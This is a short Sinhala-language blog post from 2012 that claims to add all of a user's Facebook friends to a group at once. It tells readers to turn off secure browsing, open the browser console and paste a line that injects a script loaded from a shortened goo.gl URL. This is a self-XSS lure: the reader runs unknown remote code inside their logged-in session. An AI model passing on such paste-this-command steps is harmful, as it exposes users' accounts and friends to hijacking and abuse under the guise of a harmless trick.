Subscribe:

Ads 468x60px

Labels

Thursday, December 20, 2012

FACEBOOK GROUP එකට යාළුවෝ සේරම එකපාරින් ADD කරමුද?

ෆේස් බුක් ගෘප් දේ වෙන කොට සෑහෙන්න ජනප්‍රිය මාධ්‍යක් වෙලා ඉවරයි.ෆේස්බුක් ගෘප් එකක වටිනාකම රඳා පවතින ප්‍රධානම දේ තමා මෙම්බර්ස්ලා ගාන.කොහොමද තත්පර ගානකින් තමන්ගේ යාළුවෝ සේරම තමන් කැමති ගෘප් එකට ඇඩ් කරන්න පුළුවන් උනොත්.කරන්නේ මෙහෙමයි


මෙතනින් ෆේස් බුක් ට ලොග් වෙන්න 
Account setting > Security > Secure browsing disable කරගන්න
මෙම්බර්ස්ලා ඇඩ් කරගන්න ඕනේ ගෘප් එකට යන්න
Firefox වලදී Ctrl +shift+K එකපාර ක්ලික් කරන්න chrome වල f12 ඔබන්න
යටින් එන වින්ඩෝ එකේ “console‘‘  select කරන්න
පහතින් දීලා තියෙන කෝඩ් එක ආපු වින්ඩෝ එකේ යටින්ම code add  කරන්න තියෙන තැන පේස්ට් කරන්න



document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
අවසානෙට enter ගහන්න
ටික වෙලාවකින් තමන්ගේ යාලුවෝ සේරම ගෘප් එකට ඇඩ් වෙනවා බලාගන්න පුළුවන්

          ගැටළුවක් තියේ නම් කමෙන්ට් එකකින් අහන්න.අපේ ෆේස් බුක් පේජ් එකට ලයික් එකක් දාලා යන්න ෆලෝ කරන්න අමතක කරන්න එපා.

1 comments: